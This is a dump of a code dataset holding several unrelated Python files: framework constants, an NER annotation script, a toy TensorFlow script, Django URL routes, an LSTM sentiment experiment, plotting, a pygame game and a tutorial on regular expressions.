'discovery_plugins'\nDISCOVERY_PLUGIN_AGENT_LOCK_PATH = '/panoptes/discovery/plugin_agent/plugins/lock'\nDISCOVERY_PLUGIN_AGENT_LOCK_ACQUIRE_TIMEOUT = 5\n\n# Resource Cache Related Constants\nRESOURCE_CACHE_DB_CURSOR_SIZE = 1000\nRESOURCE_CACHE_UPDATE_INTERVAL = 300\n\n# Resource Manager Related Constants\nRESOURCE_MANAGER_REDIS_GROUP = 'resources'\nRESOURCE_MANAGER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'resource_manager_kv:resource'\nRESOURCE_MANAGER_CLIENT_ID_PREFIX = 'resource_manager'\nRESOURCE_MANAGER_KAFKA_GROUP_ID = 'resource_manager_group'\nRESOURCE_MANAGER_KAFKA_POLL_TIMEOUT = 15\nRESOURCE_MANAGER_RESOURCE_EXPIRE = 604800\nRESOURCE_MANAGER_MAX_PARTITION_FETCH_BYTES = 10485760\n\n# Polling Plugin Scheduler Related Constants\nPOLLING_PLUGIN_SCHEDULER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'polling_plugin_scheduler_kv'\nPOLLING_PLUGIN_SCHEDULER_LOCK_ACQUIRE_TIMEOUT = 5\nPOLLING_PLUGIN_SCHEDULER_CELERY_APP_NAME = 'polling_plugin_scheduler'\nPOLLING_PLUGIN_SCHEDULER_CELERY_TASK_PREFIX = 'polling_plugin_task'\n\n# Enrichment Plugin Scheduler Related Constants\nENRICHMENT_PLUGIN_SCHEDULER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'enrichment_plugin_scheduler_kv'\nENRICHMENT_PLUGIN_SCHEDULER_LOCK_ACQUIRE_TIMEOUT = 5\nENRICHMENT_PLUGIN_SCHEDULER_CELERY_APP_NAME = 'enrichment_plugin_scheduler'\nENRICHMENT_PLUGIN_SCHEDULER_CELERY_TASK_PREFIX = 'enrichment_plugin_task'\n\n# Polling Plugin Agent Related Constants\nPOLLING_PLUGIN_AGENT_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'polling_plugin_agent_kv'\nPOLLING_PLUGIN_AGENT_MODULE_NAME = 'yahoo_panoptes.polling.polling_plugin_agent.polling_plugin_task'\nPOLLING_PLUGIN_AGENT_CELERY_APP_NAME = 'polling_plugin_agent'\nPOLLING_PLUGIN_AGENT_PLUGINS_CHILD_LOGGER_NAME = 'polling_plugins'\n\n# Enrichment Plugin Agent Related Constants\nENRICHMENT_REDIS_GROUP = 'enrichments'\nENRICHMENT_PLUGIN_AGENT_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'enrichment_plugin_agent_kv'\nENRICHMENT_PLUGIN_AGENT_MODULE_NAME = 'yahoo_panoptes.enrichment.enrichment_plugin_agent.enrichment_plugin_task'\nENRICHMENT_PLUGIN_AGENT_CELERY_APP_NAME = 'enrichment_plugin_agent'\nENRICHMENT_PLUGIN_AGENT_PLUGINS_CHILD_LOGGER_NAME = 'enrichment_plugins'\n\n# Enrichment Plugins Results Related Constants\nENRICHMENT_PLUGIN_RESULTS_KEY_VALUE_NAMESPACE = PLUGINS_KEY_VALUE_NAMESPACE + KV_NAMESPACE_DELIMITER + 'enrichment'\n\n# Metrics processing constants\nMETRICS_CLIENT_ID_PREFIX = 'metrics_processing'\nMETRICS_KAFKA_GROUP_ID = 'metrics_processing_group'\nMETRICS_KAFKA_POLL_TIMEOUT = 5\nMETRICS_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'metrics_kv'\nMETRICS_CONFIDENCE_THRESHOLD = 0.33\nMETRICS_KV_STORE_TTL = 14400\nMETRICS_KV_STORE_TTL_MULTIPLE = 3\n\n# Metrics topics related constants\nMETRICS_RAW_TOPIC_SUFFIX = 'metrics'\nMETRICS_PROCESSED_TOPIC_SUFFIX = 'processed'\nMETRICS_TOPIC_NAME_DELIMITER = '-'\nMETRICS_TOPIC_KEY_DELIMITER = ':'\nMETRICS_REDIS_GROUP = 'metrics'\n","sub_path":"yahoo_panoptes/framework/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"195983040","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom russian_ner import TexterraAnnotator\n# from russian_ner import annotate_texterra_articles\nfrom article_utils import LoadArticles\nimport glob\nimport argparse\nimport os\nimport pickle\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--article_glob')\n parser.add_argument('--outpath')\n # indicate what api key you want to start on (no point\n # in trying keys that we know we've burned)\n parser.add_argument('--api_start_idx', type=int, default=0)\n args = parser.parse_args()\n\n country_tags = set()\n continent_tags = set()\n annotator = TexterraAnnotator(args.api_start_idx)\n for filename in sorted(glob.iglob(args.article_glob)):\n\n # if we've already done this file, move on\n outfile_name = os.path.join(args.outpath, os.path.basename(filename) + \".pickle\")\n if os.path.isfile(outfile_name):\n print (\"Already done\", outfile_name)\n continue\n\n articles, _ = LoadArticles(filename)\n tags = annotator.annotate(articles)\n# tags = annotate_texterra_articles(articles)\n\n # clear out the crazy amount of extra text that this API returns\n for tag in tags:\n if not \"annotations\" in tag:\n continue\n if not \"named-entity\" in tag[\"annotations\"]:\n continue\n for y in tag[\"annotations\"][\"named-entity\"]:\n del y[\"annotated-text\"]\n\n # cache these guys\n fp = open(outfile_name, \"wb\")\n pickle.dump(tags, fp)\n fp.close()\n\n # maybe want to get more tags eventually\n # for d in tags['annotations']['named-entity']:\n # if d['value']['tag'] == \"GPE_COUNTRY\":\n # country_tags.add(d['text'])\n\n # elif d['value']['tag'] == \"LOCATION_CONTINENT\":\n # continent_tags.add(d['text'])\n\n print (\"Done\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/russian_ner/cleanse_russian_countries.py","file_name":"cleanse_russian_countries.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"287403535","text":"import tensorflow as tf\n\ntestNum1 = [1,5,0,4,3,2,8,0,3,2]\ntestNum2 = [3,6,1,5,4,3,1,5,5,3]\nanswer = [4,11,1,9,7,5,9,5,8,5]\n\nx = tf.placeholder(tf.float32, [None,2])\ny_ = tf.placeholder(tf.float32, [None,1])\n\nW = tf.Variable([2,1])\nb = tf.Variable([3])\ny = tf.nn.softmax(tf.matmul(x,W)+b)\n\ncross_entropy = -tf.reduce_sum(y_*tf.log(y))\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(cross_entropy)\n\npredict = tf.equal(tf.arg_max(y,1),tf.arg_max(y_,1))\naccuracy = tf.reduce_mean(tf.cast(predict, tf.float32))\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor step in range(3500):\n rows = [testNum1,testNum2]\n y_ans = answer\n fd = {x:rows,y_:y_ans}\n sess.run(train, feed_dict=fd)\n if step % 50 == 0:\n cre = sess.run(cross_entropy, feed_dict=fd)\n acc = sess.run(accuracy,feed_dict={x:rows})\n print(\"step=\",step,\"acc=\",acc,\"cre=\",cre)\n","sub_path":"Machine_learning/Test/Tensorflow_Bmi.py","file_name":"Tensorflow_Bmi.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"391839710","text":"from django.conf.urls import url\nfrom django.views.generic.base import RedirectView\n\nfrom . import views\n\nurlpatterns = [\n\n url(r'^simple/$',\n views.ImporterSimpleIndexView.as_view(),\n name='importer-simple-index'),\n url(r'^simple/institutions/$',\n views.ImportInstitutionsWizardView.as_view(),\n name='importer-simple-institutions'),\n url(r'^simple/teams/$',\n views.ImportTeamsWizardView.as_view(),\n name='importer-simple-teams'),\n url(r'^simple/adjudicators/$',\n views.ImportAdjudicatorsWizardView.as_view(),\n name='importer-simple-adjudicators'),\n url(r'^simple/venues/$',\n views.ImportVenuesWizardView.as_view(),\n name='importer-simple-venues'),\n\n # Private URLs\n url(r'^private-urls/$',\n views.RandomisedUrlsView.as_view(),\n name='randomised-urls-view'),\n url(r'^private-urls/generate/$',\n views.GenerateRandomisedUrlsView.as_view(),\n name='randomised-urls-generate'),\n\n url(r'^private-urls/email/ballot/$',\n views.EmailBallotUrlsView.as_view(),\n name='email-ballot-urls'),\n url(r'^private-urls/emails/ballot/confirm/$',\n views.ConfirmEmailBallotUrlsView.as_view(),\n name='confirm-ballot-urls-send'),\n\n url(r'^private-urls/email/feedback/$',\n views.EmailFeedbackUrlsView.as_view(),\n name='email-feedback-urls'),\n url(r'^private-urls/emails/confirm/$',\n views.ConfirmEmailFeedbackUrlsView.as_view(),\n name='confirm-feedback-urls-send'),\n\n # Old URLs for randomised URLs, now permanent redirects\n url(r'^randomised_urls/$',\n RedirectView.as_view(permanent=True, pattern_name='randomised-urls-view')),\n url(r'^randomised_urls/generate/$',\n RedirectView.as_view(permanent=True, pattern_name='randomised-urls-generate')),\n url(r'^randomised_urls/email/ballot/$',\n RedirectView.as_view(permanent=True, pattern_name='email-ballot-urls')),\n url(r'^randomised_urls/emails/ballot/confirm/$',\n RedirectView.as_view(permanent=True, pattern_name='confirm-ballot-urls-send')),\n url(r'^randomised_urls/email/feedback/$',\n RedirectView.as_view(permanent=True, pattern_name='email-feedback-urls')),\n url(r'^randomised_urls/emails/confirm/$',\n RedirectView.as_view(permanent=True, pattern_name='confirm-feedback-urls-send')),\n\n]\n","sub_path":"tabbycat/importer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"196682488","text":"# Created by Hansi at 12/22/2021\nimport logging\nimport os\n\nimport pandas as pd\nfrom sklearn.utils import shuffle\n\nfrom algo.models.nn.nn_model import NNModel\nfrom algo.util.evaluate import get_eval_results\nfrom algo.util.label_encoder import reversed_label_mapping, encode, decode\nfrom algo.util.data_processor import preprocess_data, split_data\nfrom algo.util.file_util import delete_create_folder, create_folder_if_not_exist\nfrom experiments import lstm_config\nfrom experiments.lstm_config import SEED, BASE_PATH, PREDICTION_DIRECTORY\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef train(train_file_paths, test_file_paths=None, predictions_folder=None):\n \"\"\"\n Train LSTM model\n :param train_file_paths: list\n train file format - .tsv with columns [id, tweet, label]\n :param test_file_paths: list, optional\n Given test file paths, the trained model will be evaluated on them and the results will be logged.\n :param predictions_folder: str, optional\n Given a predictions folder, test predictions will be saved\n :return:\n \"\"\"\n delete_create_folder(lstm_config.OUTPUT_DIRECTORY)\n new_data_dir = os.path.join(lstm_config.OUTPUT_DIRECTORY, f\"data\")\n delete_create_folder(new_data_dir)\n\n # merge training data\n data = pd.DataFrame(columns=['id', 'tweet', 'label'])\n for path in train_file_paths:\n temp_data = pd.read_csv(path, sep=\"\\t\", encoding=\"utf-8\")\n data = data.append(temp_data, ignore_index=True)\n if len(train_file_paths) > 1:\n data = shuffle(data, random_state=SEED)\n\n # format data\n data = data[['tweet', 'label']]\n data = data.rename({'tweet': 'text'}, axis=1)\n data = data.rename({'label': 'labels'}, axis=1)\n\n # split training data\n train, dev = split_data(data, SEED, label_column='labels', test_size=lstm_config.config['dev_size'])\n\n # encode labels\n train = encode(train, label_column='labels')\n dev = encode(dev, label_column='labels')\n\n # preprocess data\n train['text'] = train['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n dev['text'] = dev['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n\n train.to_csv(os.path.join(new_data_dir, lstm_config.config['train_file']), sep=\"\\t\", index=False)\n logger.info(f\"Saved {train.shape[0]} train instances.\")\n dev.to_csv(os.path.join(new_data_dir, lstm_config.config['dev_file']), sep=\"\\t\", index=False)\n logger.info(f\"Saved {dev.shape[0]} dev instances.\")\n\n # train model\n logger.info(f\"Training model...\")\n model = NNModel('lstm', data_dir=new_data_dir, args=lstm_config.config)\n model.train()\n\n # evaluate model\n if test_file_paths is not None:\n logger.info(f\"Evaluating model...\")\n for test_path in test_file_paths:\n logger.info(f'Predicting {test_path}...')\n test_data = pd.read_csv(test_path, sep=\"\\t\", encoding=\"utf-8\")\n logger.info(f\"Test data: {test_data.shape}\")\n\n # format and preprocess data\n test_data = test_data.rename({'tweet': 'text'}, axis=1)\n test_data['text'] = test_data['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n\n # get model predictions\n preds, raw_preds = model.predict(test_data['text'].tolist())\n # decode predicted labels\n preds = decode(preds)\n\n # evaluate results\n eval_results = get_eval_results(test_data['label'].tolist(), preds)\n logger.info(f'{test_path} results: {eval_results}')\n\n if predictions_folder is not None:\n create_folder_if_not_exist(predictions_folder, is_file_path=False)\n # save predictions\n file_name = os.path.splitext(os.path.basename(test_path))[0]\n test_data['predictions'] = preds\n for i in reversed_label_mapping.keys():\n test_data[reversed_label_mapping[i]] = raw_preds[:, i]\n test_data['id'] = test_data['id'].apply(\n lambda x: str(x)) # save id as a str to avoid round off by excel\n test_data.to_excel(os.path.join(predictions_folder, f'{file_name}.xlsx'), sheet_name='Sheet1',\n index=False)\n\n\ndef predict(data_file_path, predictions_folder, evaluate=True):\n \"\"\"\n Predict using a model, and save final sentiment and confidence values to .xlsx file\n :param data_file_path: str\n format - .tsv file with column 'tweet'\n :param predictions_folder: str\n :param evaluate: boolean, optional\n If true the predictions will be evaluated and there should be a 'label' column in input data to use with\n evaluation.\n :return:\n \"\"\"\n create_folder_if_not_exist(PREDICTION_DIRECTORY, is_file_path=False)\n file_name = os.path.splitext(os.path.basename(data_file_path))[0]\n\n data = pd.read_csv(data_file_path, sep=\"\\t\", encoding=\"utf-8\")\n data = data.rename({'tweet': 'text'}, axis=1)\n data['text'] = data['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n\n model = NNModel(lstm_config.config['best_model_dir'])\n preds, raw_preds = model.predict(data['text'].tolist())\n # decode predicted labels\n preds = decode(preds)\n\n if evaluate:\n eval_results = get_eval_results(data['label'].tolist(), preds)\n logger.info(eval_results)\n\n data['predictions'] = preds\n for i in reversed_label_mapping.keys():\n data[reversed_label_mapping[i]] = raw_preds[:, i]\n data['id'] = data['id'].apply(lambda x: str(x)) # save id as a str to avoid round off by excel\n data.to_excel(os.path.join(predictions_folder, f'{file_name}.xlsx'), sheet_name='Sheet1', index=False)\n\n\nif __name__ == '__main__':\n fifa_train_file = os.path.join(BASE_PATH, 'data/fifa_2014/train.tsv')\n fifa_test_file = os.path.join(BASE_PATH, 'data/fifa_2014/test.tsv')\n semeval_train_file = os.path.join(BASE_PATH, 'data/semeval_data/train.tsv')\n semeval_test_file = os.path.join(BASE_PATH, 'data/semeval_data/test.tsv')\n munliv_train_file = os.path.join(BASE_PATH, 'data/munliv/munliv_train.tsv')\n munliv_test_file = os.path.join(BASE_PATH, 'data/munliv/munliv_test.tsv')\n brexitvote_train_file = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote_train.tsv')\n brexitvote_test_file = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote_test.tsv')\n predictions_folder = lstm_config.PREDICTION_DIRECTORY\n\n train_file_paths = [fifa_train_file]\n test_file_paths = [fifa_test_file, munliv_test_file, semeval_test_file, brexitvote_test_file]\n # train(train_file_paths, test_file_paths=test_file_paths, predictions_folder=predictions_folder)\n\n munlive_file = os.path.join(BASE_PATH, 'data/munliv/munliv-15.28-17.23.tsv')\n predict(munlive_file, predictions_folder, evaluate=False)\n munlive_file_no_dups = os.path.join(BASE_PATH, 'data/munliv/munliv-15.28-17.23-no_duplicates.tsv')\n predict(munlive_file_no_dups, predictions_folder, evaluate=False)\n\n brexitvote_file = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote-08.00-13.59.tsv')\n predict(brexitvote_file, predictions_folder, evaluate=False)\n brexitvote_file_no_dups = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote-08.00-13.59-no_duplicates.tsv')\n predict(brexitvote_file_no_dups, predictions_folder, evaluate=False)","sub_path":"experiments/lstm_experiment.py","file_name":"lstm_experiment.py","file_ext":"py","file_size_in_byte":7592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"349317859","text":"r\"\"\"knock36.py\n36. 頻度上位10語\n出現頻度が高い10語とその出現頻度をグラフ(例えば棒グラフなど)で表示せよ.\n\n[URL]\nhttps://nlp100.github.io/ja/ch04.html#36-頻度上位10語\n\n[Usage]\npython knock36.py\n\"\"\"\nimport matplotlib.pyplot as plt\n\nfrom knock35 import build_cnter\n\nif __name__ == \"__main__\":\n query = {\"surface\": \"表層形\"}\n num = 10\n\n cnter = build_cnter(query)\n labels, data = zip(*cnter.most_common(num))\n\n plt.bar(range(num), data)\n plt.title(f\"頻度上位 {num} 語\")\n plt.xticks(range(num), map(lambda x: f'\"{x}\"', labels))\n plt.xlabel(f\"単語({query})\")\n plt.ylabel(\"出現頻度\")\n plt.savefig(\"out36.png\")\n","sub_path":"kiyuna/chapter04/knock36.py","file_name":"knock36.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"335943145","text":"import pygame\r\nfrom player import Player\r\nfrom board import Board\r\nfrom anime import Anime\r\nfrom tverdolobiy import Tverdolobiy\r\nfrom merzopakostniy import Merzopakostniy\r\nfrom legushka import Legushka\r\nfrom button import Button\r\nfrom chek import Check\r\nfrom finish import Finish\r\nfrom game import screen, terminate, FPS, FON, draw, name\r\n\r\nup, down, left, right = ([119, 275], [115, 273], [97, 274], [100, 276])\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndef game():\r\n group = pygame.sprite.Group()\r\n player_anim = Anime(group, (228, 288))\r\n board = Board.load_map(None, name)\r\n board.set_view(30, 30, 30)\r\n lst = []\r\n if sum(board.hero[0]):\r\n player = Player(screen, player_anim, board, board.hero[0])\r\n player_anim.resize(30)\r\n if sum(board.hero[1]):\r\n tverdolobiy = Tverdolobiy(group, board.hero[1], board, player)\r\n tverdolobiy.resize(30)\r\n lst.append(tverdolobiy)\r\n if sum(board.hero[2]):\r\n merzopakostniy = Merzopakostniy(group, board.hero[2], board, player)\r\n merzopakostniy.resize(30)\r\n if sum(board.hero[3]):\r\n legushka = Legushka(group, board.hero[3], board, player)\r\n legushka.resize(30)\r\n lst.append(legushka)\r\n running = True\r\n c = 0\r\n while running:\r\n c += 1\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n board.get_click(event.pos)\r\n if event.type == pygame.KEYDOWN:\r\n if event.key in up:\r\n player.set_dir('up')\r\n if event.key in down:\r\n player.set_dir('down')\r\n if event.key in left:\r\n player.set_dir('left')\r\n if event.key in right:\r\n player.set_dir('right')\r\n if event.key == pygame.K_LEFT:\r\n player.set_dir('left')\r\n if event.key == pygame.K_RIGHT:\r\n player.set_dir('right')\r\n if event.key == pygame.K_UP:\r\n player.set_dir('up')\r\n if event.key == pygame.K_DOWN:\r\n player.set_dir('down')\r\n screen.fill((0, 0, 0))\r\n board.render()\r\n if not len(board.check_points):\r\n board.check_points.add(None)\r\n if not board.are_left():\r\n board.reset()\r\n player.move([])\r\n player_anim.rect.x, player_anim.rect.y = player.x, player.y\r\n if sum(board.hero[2]):\r\n merzopakostniy.move()\r\n if not c % 2:\r\n if sum(board.hero[3]):\r\n legushka.move()\r\n if sum(board.hero[1]):\r\n tverdolobiy.move()\r\n group.draw(screen)\r\n if c % 20 == 0:\r\n player_anim.update()\r\n if sum(board.hero[2]):\r\n check = Check(player, merzopakostniy.num_bomb() + lst)\r\n elif sum(board.hero[0]):\r\n check = Check(player, lst)\r\n if check.checkaed():\r\n running = False\r\n draw(str(len(board.check_points) - 1 + board.count))\r\n pygame.display.flip()\r\n Finish(group, str(len(board.check_points) - 1 + board.count))\r\n\r\n\r\ndef load_screen():\r\n if True:\r\n p = (-1, -1)\r\n f = False\r\n group = pygame.sprite.Group()\r\n b = Button()\r\n screen.blit(FON, (0, 0))\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n elif event.type == pygame.MOUSEMOTION:\r\n p = event.pos\r\n group.update(event.pos, False)\r\n b.update(event.pos)\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if b.update(event.pos, True):\r\n game()\r\n return\r\n group.update(p, f)\r\n group.draw(screen)\r\n pygame.display.flip()\r\n clock.tick(FPS)\r\n\r\n\r\nwhile True:\r\n load_screen()\r\n","sub_path":"game/Play.py","file_name":"Play.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"183412126","text":"\n#! python3\n\n###############################\n#Regular Expressions\n###############################\n\n#these are similar to Ctrl+F commands in a browser, but can look for patterns\n#not just specific strings\n\n#non regular expression example\n#look at how much we have to add if we want to check to see if something is a valid phone number\n\ndef isPhoneNumber(text):\n if len(text) != 12:\n return False\n for i in range (0,3):\n if not text[i].isdecimal():\n return False\n if text[3] != '-':\n return False\n for i in range (4,7):\n if not text[i].isdecimal():\n return False\n if text[7] != '-':\n return False\n for i in range (8,12):\n if not text[i].isdecimal():\n return False\n return True\n\nstring = '415-555-1234'\nprint(isPhoneNumber(string))\nstring = '415-bana-1234'\nprint(isPhoneNumber(string))\n\n\nmessage = 'Call me at 415-555-1234'\nfoundNumber = False\nfor i in range(len(message)):\n chunk = message[i:i+12]\n if isPhoneNumber(chunk):\n print('Phone Number found!')\n foundNumber = True\n\nif foundNumber == False:\n print('no number found')\n\n\n#now lets do this with regular expressions\n#Steps:\n#Import re module\n#create the string value you wish to search\n#create the regex compile object\n#use the search or findall functions to return values!\n\nimport re\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d')\nmatch = phoneNumRegex.search(message)\nprint(match.group())\n\n#NOTE: you usually pass raw strings to re.compile()\n\n#this returns the first instance of this patter\n#we can also use find all instead!\nmatch = phoneNumRegex.findall(message)\nprint(match)\n\n###############################\n#GROUPS\n###############################\n#what if we wanted to get only the area code?\n#we can use parantheses to divide the returned match into groups\n#those groups can then be returned individually using match.group(#)\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'(\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d)')\nmatch = phoneNumRegex.search(message)\nprint(match.group(1))\nprint(match.group(2))\n\n#by using an escape character we can actually treat a parantheses as a character in\n#our target string pattern\n\n###############################\n#Pipe Characters\n###############################\nmessage = 'I am the Batman and I drive a Batcopter, also Batbat'\n\nbatNumRegex = re.compile(r'Bat(man|copter|bat)')\n\n#returns first instance of compound word: Batman\nmatch = batNumRegex.search(message)\nprint(match.group())\n\n#this only returns the suffixes: \nmatch = batNumRegex.findall(message)\nprint(match)\n\n###############################\n#Optional Portions '?' and '*' syntax\n###############################\n\n#I want to search for a pattern that may or may not include something in the middle\n\nmessage = 'I am the Batman and I drive a Batcopter, also Batwoman is cool, Batwowoman'\nbatNumRegex = re.compile(r'Bat(man|woman)')\nmatch = batNumRegex.findall(message)\nprint(match)\n\n#I can also do :\nbatNumRegex = re.compile(r'Bat(wo)?man')\nmatch = batNumRegex.search(message)\nprint(match.group())\n\n# the (wo)? means this middle string can occur or not occur bt will still be included\n\n#can we apply this to the phone number one to make area code optional?\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'(\\d\\d\\d-)?\\d\\d\\d-\\d\\d\\d\\d')\nmatch = phoneNumRegex.search(message)\nprint(match.group())\nmatch = phoneNumRegex.findall(message)\nprint(match)\n\n#using the * character instead of ?, we can search for any number of repetitions\n\nmessage = 'I am the Batman and I drive a Batcopter, also Batwoman is cool, Batwowoman'\nbatNumRegex = re.compile(r'Bat(wo)*man')\nmatch = batNumRegex.findall(message)\nprint(match)\n\n\n###############################\n#Required Portions '+' syntax\n###############################\n\n#The + character instead of * or ? means that the portion must appear at least once\n\nmessage = 'I am the Batman and I drive a Batcopter, also Batwoman is cool, Batwowoman'\nbatNumRegex = re.compile(r'Bat(wo)+man')\nmatch = batNumRegex.findall(message)\nprint(match)\n\n###############################\n#Required Portions with exact # of repetitions '{}' syntax\n###############################\n\n#Having a {#} after a (pattern) says only find instances where it occurrs # of times exactly\n\nmessage = 'Ha HaHa HaHaHa HaHaHaHa'\nHaRegex = re.compile(r'(Ha){3}')\nmatch = HaRegex.findall(message)\nprint(match)\n\n\n#you can also add another param to {} to set a max value\n\nmessage = 'Ha HaHa HaHaHa HaHaHaHa'\nHaRegex = re.compile(r'(Ha){3,5}')\nmatch = HaRegex.findall(message)\nprint(match)\n\n#you can add a ? at the end of the {} to do a NON greedy match\n\n#this one finds the will go to the max length on the first valid instance of 3 to 5 numbers\n#GREEDY\nmessage = '123456789'\nnumRegex = re.compile(r'(\\d){3,5}')\nmatch = numRegex.search(message)\nprint(match.group())\n\n#This one will return the first valid options, which would be 3 numbers\n#NON-GREEDY\nnumRegex = re.compile(r'(\\d){3,5}?')\nmatch = numRegex.search(message)\nprint(match.group())\n\n\n\n###############################\n# .findall()\n###############################\n\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'((\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d))')\n#only returns first instance\nmatch = phoneNumRegex.search(message)\nprint(match.group())\n\n#returns all instances but returned data types are a little different than normal\n#groups can change how they items are returned\n#see example below\nmatch = phoneNumRegex.findall(message)\nprint(match)\n# [('415-555-1234', '415', '555-1234'), ('555-555-5555', '555', '555-5555')]\n\n\n###############################\n# Character Classes\n###############################\n\n#number\n# \\d\n#anything BUT a number\n# \\D\n#any letter, number, underscore\n# \\w\n#anything BUT letter, number, underscore\n# \\W\n#any space, tab, newline\n#\\s\n#anything BUT space, tab, newline\n#\\S\n\n\nlyrics = '12 drummers drumming, 11 pipers piping, 10 lords a leaping'\n\nxmasRegex = re.compile(r'\\d+\\s\\w+')\nmatch = xmasRegex.findall(lyrics)\nprint(match)\n# ['12 drummers', '11 pipers', '10 lords']\n\n#create your own character class using []\n\n#all lower case letters a to z\nletterRegex = re.compile(r'[a-z]')\n\n#all vowels\nvowelRegex = re.compile(r'[aeiouAEIOU]')\nprint(vowelRegex.findall('RoboCop eats baby food!'))\n\n#all vowels that occur twice in a row\nvowelRegex = re.compile(r'[aeiouAEIOU]{2}')\nprint(vowelRegex.findall('RoboCop eats baby food!'))\n\n#we can also do the anything BUT our choices using '^'\n#includes ALL other characters\nvowelRegex = re.compile(r'[^aeiouAEIOU]{2}')\nprint(vowelRegex.findall('RoboCop eats baby food!'))\n\n\n###############################\n# regex with begins and ends\n###############################\n#this returns a result\nmessage = 'Hello there!'\nbeginsRegex = re.compile(r'^Hello')\nprint(beginsRegex.findall(message))\n#['Hello']\n\n#this does not\nmessage = 'oh hello!'\nbeginsRegex = re.compile(r'^Hello')\nprint(beginsRegex.findall(message))\n#[]\n\n\n#Ends with uses $ instead of ^\n\n#this does not\n#this returns a result\nmessage = 'Hello! there!'\nendsRegex = re.compile(r'Hello!$')\nprint(endsRegex.findall(message))\n#[]\n\n#this returns a result\nmessage = 'oh Hello!'\nendsRegex = re.compile(r'Hello!$')\nprint(endsRegex.findall(message))\n#['Hello!']\n\n\n#can also do this with pattens and combine\n\nmessage = '12oh Hello!34'\nendsRegex = re.compile(r'^(\\d)+(\\w)+(\\s)Hello!(\\d)+$')\nprint(endsRegex.findall(message))\n#[('2', 'h', ' ', '4')]\n\n\n\n###############################\n# wildcards '.'\n###############################\nmessage = 'cat bat flat'\natRegex = re.compile(r'.at')\nprint(atRegex.findall(message))\natRegex = re.compile(r'.{1,2}at')\nprint(atRegex.findall(message))\n\n\n# '.*' means ALL characters\nmessage = 'First Name: Bob Last Name: Smith'\nnameRegex = re.compile(r'First Name: (.*) Last Name: (.*)')\nprint(nameRegex.findall(message))\n#[('Bob', 'Smith')]\n\n#Be aware of GREEDY vs NON-GREEDY\nmessage = ' Last Name: Smith>'\nnameRegex = re.compile(r'<(.*)>')\nprint(nameRegex.findall(message))\n#['First Name: Bob> Last Name: Smith']\nnameRegex = re.compile(r'<(.*?)>')\nprint(nameRegex.findall(message))\n#['First Name: Bob']\n\n#new lines '\\n' are not included in .*\nmessage = 'First Name: Bob\\nLast Name: Smith'\nnameRegex = re.compile(r'(.*)')\nprint(nameRegex.findall(message))\n['First Name: Bob', '', 'Last Name: Smith', '']\n\n#returns the full line\n#include re.DOTALL in compile object\nnameRegex = re.compile(r'(.*)', re.DOTALL)\nprint(nameRegex.findall(message))\n#['First Name: Bob\\nLast Name: Smith', '']\n\n# there are other parameters you can use like:\n# re.IGNORECASE to ignore the case sensitivity\n\n\n###############################\n# sub()\n###############################\n\n#can also use sub() for only some pieces of the targets\n\nmessage = 'Agent Alice shot Agent Bob'\nnamesRegex = re.compile(r'Agent (\\w+)')\nprint(namesRegex.findall(message))\n#['Agent Alice', 'Agent Bob']\nprint(namesRegex.sub('REDACTED', message))\n#REDACTED shot REDACTED\n\nnamesRegex = re.compile(r'Agent (\\w)\\w*')\nprint(namesRegex.sub(r'Agent \\1******', 